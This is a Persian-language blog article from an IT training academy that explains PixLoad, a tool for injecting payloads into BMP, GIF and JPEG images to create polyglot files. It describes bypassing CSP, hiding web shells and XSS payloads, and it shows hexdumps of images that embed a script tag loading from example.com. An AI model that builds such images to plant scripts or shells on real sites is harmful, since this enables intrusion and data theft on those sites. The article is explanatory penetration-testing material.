جستجو برای:
  • تقویم آموزشی
  • آموزش
    • آموزش آنلاین
    • آموزش آفلاین
  • لابراتوار آنلاین
  • وبینارها
    • پایتون برای هر چیزی
    • وبینار معرفی پیش نیاز های دوره های امنیت
    • وبینار معرفی دوره جامع Cisco Collaboration
    • وبینار معرفی دوره مهندسی پایتون
    • ذهنیت ها و تکنیک های چابکی برای توانمندسازی it
    • راه اندازی IP Telephony سیسکو در شبکه های سازمانی
    • وبینار Infrastructure as Code
    • وبینار امنیت سیستم های کنترل صنعتی
    • وبینار معرفی مرکز عملیات امنیت
    • وبینار ربات نویسی تلگرام با پایتون
    • وبینار نفوذ و گرفتن دسترسی از تلگرام
    • وبینار اصول نظارت بر شبکه های مخابراتی با رویکرد رگولاتوری
    • وبینار CSCU
    • وبینار Container on Wheels
    • وبینار مسیر آموزشی SANS
    • وبینار پدافند غیرعامل
    • وبینار Wazuh
  • بین الملل
    • ورود و ثبت نام کاربران
    • آموزشگاه های بین المللی
    • آزمون های بین المللی
  • دوره ها
    • امنیت
      • EC-Council
      • F5
      • Fortinet
      • ISACA
      • ISC2
      • Juniper
      • Payment Security
      • SANS
      • SCADA
      • Secure coding
      • SOC
      • Splunk
    • بانک اطلاعاتی
      • Oracle
      • SQL Server
    • برنامه نویسی
      • IOS
      • programming & Web
    • ذخیره و بازیابی اطلاعات
      • Big Data
      • EMC
      • HP
      • Netbackup
      • veeam
    • شبکه
      • Cisco Old Level
      • Cisco New Level
      • CompTIA
      • EPI
      • Linux
      • Microsoft
      • Mikrotik
      • SolarWinds
    • کارکنان دولت
    • مجازی سازی
      • Cloud computing
      • Hyper-V
      • VMWare
      • AWS
      • Azure
    • Devops
    • مخابرات
    • مدیریت فناوری اطلاعات
      • ISO 27001
      • IT Management
      • Project Management
    • ارزهای دیجیتال
    • ویژه دوران
      • کارگاه ها و سمینارها
      • محصولات دوران
  • کتابخانه
  • پادکست
  • ویدئوها
 
  • 02143585
  • دعوت به همکاری
  • درباره ما
  • تماس با ما
  • گروه دوران
  • دورتال
  • بلاگ
دوران آکادمی
دسته بندی‌ دوره‌ها
  • شبکه
    • Microsoft
    • SolarWinds
    • CompTIA
    • Cisco Old Level
      • Cisco New Level
    • Mikrotik
    • Linux
    • EPI
  • مخابرات
    • مخابرات
  • امنیت
    • ISC2
    • F5
    • EC-Council
    • Juniper
    • SOC
    • Fortinet
    • SANS
    • SCADA
    • ISACA
    • Secure coding
    • Payment Security
    • Splunk
  • مجازی سازی
    • Hyper-V
    • Cloud computing
    • VMWare
    • AWS
    • Azure
  • Devops
    • Devops
  • مدیریت فناوری اطلاعات
    • ISO 27001
    • IT Management
    • Project Management
  • برنامه نویسی
    • IOS
    • programming & Web
  • ذخیره و بازیابی اطلاعات
    • Big Data
    • HP
    • EMC
    • Netbackup
    • veeam
  • بانک اطلاعاتی
    • Oracle
    • SQL Server
  • دیجیتال مارکتینگ
    • دیجیتال مارکتینگ
  • ارزهای دیجیتال
    • ارزهای دیجیتال
  • ویژه دوران
    • کارگاه ها و سمینارها
    • محصولات دوران
    • کارکنان دولت
0

ورود و ثبت نام

  • صفحه اصلی
  • تقویم آموزشی
  • آموزش آنلاین
  • لابراتوار آنلاین
  • وبینارها
    • پایتون برای هر چیزی
    • وبینار معرفی پیش نیاز های دوره های امنیت
    • وبینار معرفی دوره جامع Cisco Collaboration
    • وبینار معرفی دوره مهندسی پایتون
    • ذهنیت ها و تکنیک های چابکی برای توانمندسازی it
    • راه اندازی IP Telephony سیسکو در شبکه های سازمانی
    • وبینار Infrastructure as Code
    • وبینار امنیت سیستم های کنترل صنعتی
    • وبینار معرفی مرکز عملیات امنیت
    • وبینار ربات نویسی تلگرام با پایتون
    • وبینار نفوذ و گرفتن دسترسی از تلگرام
    • اصول نظارت بر شبکه های مخابراتی
    • وبینار CSCU
    • وبینار Container on Wheels
    • وبینار مسیر آموزشی SANS
    • وبینار پدافند غیرعامل
    • وبینار Wazuh
  • بین الملل
    • آموزشگاه های بین المللی
    • آزمون های بین المللی
  • فرم پیش ثبت نام
  • کتابخانه
  • پادکست
  • ویدئوها

وبلاگ

دوران آکادمی بلاگ مقالات PixLoad چیست و چه کاربردی دارد؟

PixLoad چیست و چه کاربردی دارد؟

1401/07/17
ارسال شده توسط sheikhi
مقالات
651 بازدید
کاربرد Payload در PixLoad چیست

یکی از ابزار های فوق پیشرفته در زمینه ی پایش نفوذ، Pixload است که با استفاده از آن می توان اقدام به ساخت Payload نمود. همچنین با استفاده از این ابزار می توان Payload های مخرب را به تصاویر با هر نوع فرمتی تزریق کرد. با استفاده از Pixload می توان فایل های Polyglot را ساخت، که با استفاده از آن می توان به سادگی مکانیزم های CSP را دور زد. برای درک بهتر این که PixLoad چیست، باید بگوییم که با استفاده از این ابزار می توان فایل های مورد نظر را بر روی سرور سایت هدف، برای به دست آوردن داده های مورد نیاز بارگذاری نمود.

از این رو این ابزار می تواند در عملیات هایی چون تست نفوذ بسیار کارآمد باشد. از مهمترین مزیت PixLoad می توان به سازگاری بسیار بالای آن با انواع مرورگر هایی چون Edge، Safari، Chrome، Firefox و… اشاره کرد.

Polyglot چیست؟

فایل هایی که با فرمت های مختلف و با استفاده از زبان های برنامه نویسی گوناگون ساخته شده باشند و در کنار یکدیگر قرار گیرند با نام Polyglot شناخته می شوند.

ویژگی های PixLoad چیست

ویژگی های PixLoad چیست؟

  • قابلیت دور زدن و گذشتن از مکانیزم امنیتی CSP با استفاده از فایل JPEG Polyglot
  • امکان رمزنگاری Web Shell و قرار دادن XSS Payload در فایل های PNG و IDAT
  • امکان ساخت فایل های تصویری مخرب در فرمت های مختلف
  • توانایی ایجاد فایل های Polyglot

یکی از ابزار های فوق پیشرفته در زمینه ی پایش نفوذ، Pixload است.

کاربرد Payload در PixLoad چیست؟

برای این که بدانیم PixLoad چیست باید با فایل های Payload و کاربرد آنها بیشتر آشنا شویم. همان طور که پیشتر گفته شد یکی از کاربرد های PixLoad ساخت فایل های Payload می باشد. در حقیقت از Payload به عنوان یک مولفه برای حمله سایبری استفاده می شود. به زبان ساده تر تمامی ویروس ها و بد افزار ها حاوی مقادیر زیادی Payload می باشند. حتی از Payload در پیوست ایمیل های مخرب نیز استفاده می شود. در ادامه به چند مورد از نحوه ی آسیب رسانی فایل های Payload اشاره شده است.

  • یکی از شایع ترین اهداف Payload سرقت داده های حساس مانند اطلاعات مالی می باشد.
  • در برخی مواقع از Payload برای جاسوسی و زیر نظر داشتن فعالیت های کاربر استفاده می شود. به طور معمول این گونه اطلاعات به شرکت های تبلیغاتی فروخته می شوند.
  • در برخی مواقع از Payload برای نمایش مداوم محتواهای تبلیغاتی به طور ناخواسته استفاده می شود.
  • یکی از موارد استفاده از Payload به شکل مخرب و بسیار خطرناک پاک کردن داده های کامپیوتر و مدارک است. Payload های مخرب ممکن است برای پاک کردن داده های سیستمی سیستم عامل برای از کار انداختن کامپیوتر استفاده شوند. حتی در برخی مواقع موجب خاموش شدن گوشی های هوشمند می شوند.
  • از دیگر کاربرد های Payload می توان به اجرای برنامه های پس زمینه اشاره کرد. این گونه فعالیت ها می تواند استخراج رمز ارز و یا سرقت اطلاعات موجود در سیستم به صورت کاملا مخفی باشد.

یکی از شایع ترین اهداف Payload سرقت داده های حساس مانند اطلاعات مالی می باشد.

نحوه ی اجرای Payload ها

حال که دریافتیم PixLoad چیست و چه کاربردی دارد باید برای بارگذاری Payload دریابیم که قرار است چگونه اجرا گردد. این که یک فایل Payload چگونه اجرا شود کاملا بستگی به نحوه ی برنامه ریزی آن دارد. برای ساخت Payload مهاجمان به دنبال راهکاری برای نفوذ Payload به رایانه قربانی می گردند. به طور معمول پس از وارد شدن Payload به سیستم قربانی تا زمان اجرا به طور خاموش باقی می ماند. مهاجمان از روش های مختلفی برای اجرای Payload استفاده می کنند.

  • یکی از شایع ترین روش ها تحریک قربانی برای باز کردن فایل Payload می باشد. Payload می تواند با استفاده از ابزار PixLoad در یک فایل تصویری جایگذاری شده باشد.
  • یکی دیگر از روش ها بمب منطقی نام دارد. در این روش Payload به صورت یک جاسوس تمامی فعالیت های کاربر را زیر نظر می گیرد. در این حالت با توجه به شواهد و برنامه ریزی که بر روی Payload صورت گرفته است اجرا می شود.

نحوه بکارگیری PixLoad در ساخت تصاویر مخرب

PixLoad شامل مقادیری Payload به صورت پیش فرض می باشد. از این رو در ادامه می توانید با نحوه ی وارد کردن Payload مخرب به فایل تصاویر آشنا شوید. برای انجام این کار فقط کافی است که به دایرکتوری PixLoad وارد شده و مطابق با نیاز خود اقدام به ساخت تصاویر مخرب کنید.

  1. ……… BMP Payload Creator/Injector ……..
  2. ………………………………………..
  3. … https://github.com/chinarulezzz/pixload …
  4. ………………………………………..
  1. [>] Generating output file
  2. [✔] File saved to: payload.bmp
  1. [>] Injecting payload into payload.bmp
  2. [✔] Payload was injected successfully
  1. payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1 x 24, cbSize 10799, bits offset 26
  • 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00  |BM/*…………|
  1. 00000010 00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |…………..*/|
  2. 00000020 3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
  3. 00000030 2f 65 78 61 6d 70 6c 65  2e 63 6f 6d 3e 3c 2f 73  |/example.com></s|
  4. 00000040 63 72 69 70 74 3e 3b                              |cript>;|
  5. 00000047

یکی از شایع ترین روش ها تحریک قربانی برای باز کردن فایل Payload می باشد.

نحوه بکارگیری PixLoad در ساخت تصاویر مخرب

تزریق Payload به فایل تصویر با پسوند GIF در PixLoad چیست؟

1.      …….. GIF Payload Creator/Injector ………2.      ………………………………………..3.      … https://github.com/chinarulezzz/pixload …4.      ……………………………………….. 5.      [>] Generating output file6.      [✔] File saved to: payload.gif 7.      [>] Injecting payload into payload.gif8.      [✔] Payload was injected successfully 9.      payload.gif: GIF image data, version 87a, 10799 x 32 10.  47 49 46 38 37 61 2f 2a  20 00 80 00 00 04 02 04  |GIF87a/* …….|11.  00 00 00 2c 00 00 00 00  20 00 20 00 00 02 1e 84  |…,…. . …..|12.  00000020  8f a9 cb ed 0f a3 9c b4  da 8b b3 de bc fb 0f 86  |…………….|13.  00000030  e2 48 96 e6 89 a6 ea ca  b6 ee 0b 9b 05 00 3b 2a  |.H…………;*|14.  00000040  2f 3d 31 3b 3c 73 63 72  69 70 74 20 73 72 63 3d  |/=1;<script src=|15.  00000050  2f 2f 65 78 61 6d 70 6c  65 2e 63 6f 6d 3e 3c 2f  |//example.com></|16.  00000060  73 63 72 69 70 74 3e 3b                           |script>;|17.  00000068

با استفاده از PixLoad می توان Payload های مخرب را به تصاویر با هر نوع فرمتی تزریق کرد.

تزریق Payload به فایل تصویر با پسوند JPEG

1.      …….. JPEG Payload Creator/Injector ……..2.      ………………………………………..3.      … https://github.com/chinarulezzz/pixload …4.      ……………………………………….. 5.      [>] Generating output file6.      [✔] File saved to: payload.jpg 7.      [>] Injecting payload into COMMENT8.      [✔] Payload was injected successfully 9.      payload.jpg: JPEG image data, progressive, precision 8, 1×1, components 1 00           ff d8 ff fe 00 25 3c 73  63 72 69 70 74 20 73 72  |…..%<script sr|10.  00000010  63 3d 2f 2f 65 78 61 6d  70 6c 65 2e 63 6f 6d 3e  |c=//example.com>|11.  00000020  3c 2f 73 63 72 69 70 74  3e ff db 00 43 00 01 01  |</script>…C…|12.  00000030  01 01 01 01 01 01 01 01  01 01 01 01 01 01 01 01  |…………….|13.  *14.  00000060  01 01 01 01 01 01 01 01  01 01 01 01 01 01 ff c2  |…………….|15.  00000070  00 0b 08 00 01 00 01 01  01 11 00 ff c4 00 14 00  |…………….|16.  00000080  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |…………….|17.  00000090  03 ff da 00 08 01 01 00  00 00 01 3f ff d9        |………..?..|18.  0000009e

جمع بندی PixLoad چیست؟

PixLoad چیست و چه کاربردی دارد؟ این سوالی است که در این مقاله سعی بر پاسخ به آن نمودیم. به طور خلاصه باید بگوییم که PixLoad ابزاری برای ساخت و تزریق فایل های مخرب مانند Payload در فایل های مختلف تصویری می باشد. از این رو می توان از این ابزار برای نفوذ به سیستم های مختلف استفاده نمود. Payload ها می توانند در فایل تصاویر مخفی شوند و پس از باز شدن توسط کاربر شروع به فعالیت نمایند.

۱
۲
۳
۴
۵
میانگین امتیازات ۵ از ۵
از مجموع ۱ رای
اشتراک گذاری:
در تلگرام
کانال ما را دنبال کنید!
در اینستاگرام
ما را دنبال کنید!
محتوا پنهان
1 Polyglot چیست؟
2 ویژگی های PixLoad چیست؟
3 کاربرد Payload در PixLoad چیست؟
4 نحوه ی اجرای Payload ها
5 نحوه بکارگیری PixLoad در ساخت تصاویر مخرب
5.1 تزریق Payload به فایل تصویر با پسوند GIF در PixLoad چیست؟
5.2 تزریق Payload به فایل تصویر با پسوند JPEG
مطالب زیر را حتما بخوانید
  • اسکریپت نویسی شل چیست؟
    اسکریپت نویسی شل چیست؟

    38 بازدید

  • جیسون (JSON) برای پایتون
    جیسون (JSON) برای پایتون

    127 بازدید

  • جیسون (json) چیست؟
    جیسون (json) چیست؟

    98 بازدید

  • اکسپلویت سرریز بافر

    217 بازدید

  • پهنای باند چیست
    پهنای باند چه چیزی هست (پهنای باند چیست)

    385 بازدید

  • برنامه نویسی ktolin
    برنامه نویسی kotlin

    301 بازدید

قدیمی تر VoIP PBX چیست و چه تاثیری بر فرایند های سازمانی دارد؟
جدیدتر اینترنت اشیا چیست؛ هر آنچه باید درباره(IoT) بدانید!
0 0 رای ها
رأی دهی به مقاله
اشتراک در
وارد شدن
اطلاع از
guest

guest

0 نظرات
بازخورد (Feedback) های اینلاین
مشاهده همه دیدگاه ها
دسته‌های دوره های آموزشی
  • آموزش دوره های devOPS
  • ارزهای دیجیتال
  • امنیت
    • EC-Council
    • F5
    • Fortinet
    • ISACA
    • ISC2
    • Juniper
    • Payment Security
    • SANS
    • SCADA
    • Secure coding
    • SOC
    • Splunk
  • بانک اطلاعاتی
    • Oracle
    • SQL Server
  • برنامه نویسی
    • IOS
    • programming & Web
  • درحال برگزاری
  • دیجیتال مارکتینگ
  • ذخیره و بازیابی اطلاعات
    • Big Data
    • EMC
    • HP
    • Netbackup
    • veeam
  • شبکه
    • Cisco Old Level
      • Cisco New Level
    • CompTIA
    • EPI
    • Linux
    • Microsoft
    • Mikrotik
    • SolarWinds
  • کارکنان دولت
  • مجازی سازی
    • AWS
    • Azure
    • Cloud computing
    • Hyper-V
    • VMWare
  • مخابرات
  • مدیریت فناوری اطلاعات
    • ISO 27001
    • IT Management
    • Project Management
  • ویژه دوران
    • کارگاه ها و سمینارها
    • محصولات دوران
محتوا پنهان
1 Polyglot چیست؟
2 ویژگی های PixLoad چیست؟
3 کاربرد Payload در PixLoad چیست؟
4 نحوه ی اجرای Payload ها
5 نحوه بکارگیری PixLoad در ساخت تصاویر مخرب
5.1 تزریق Payload به فایل تصویر با پسوند GIF در PixLoad چیست؟
5.2 تزریق Payload به فایل تصویر با پسوند JPEG
اطلاعات تماس
  • خیابان بهشتی، خیابان پاکستان، خیابان حکیمی پلاک ۱۲
  • 02143585 داخلی 264 و 257 و 269
  • 02143585555
پیوندهای مهم
  • گالری
  • مجوزها
  • فرم پیش ثبت نام
  • مشتریان
  • فرم درخواست مدرک
  • لابراتوار آنلاین
  • در حال تکمیل ظرفیت
  • سند راهبردی آموزش
  • بلاگ
تمامی حقوق برای آکادمی دوران محفوظ می باشد.

آموزش نه ! استخدامت هم با آکادمی دوران  ( کلیک کنید)

wpDiscuz
0
0
افکار شما را دوست داریم، لطفا نظر دهید.x
()
x
| پاسخ

ورود

رمز عبور را فراموش کرده اید؟

هنوز عضو نشده اید؟ عضویت در سایت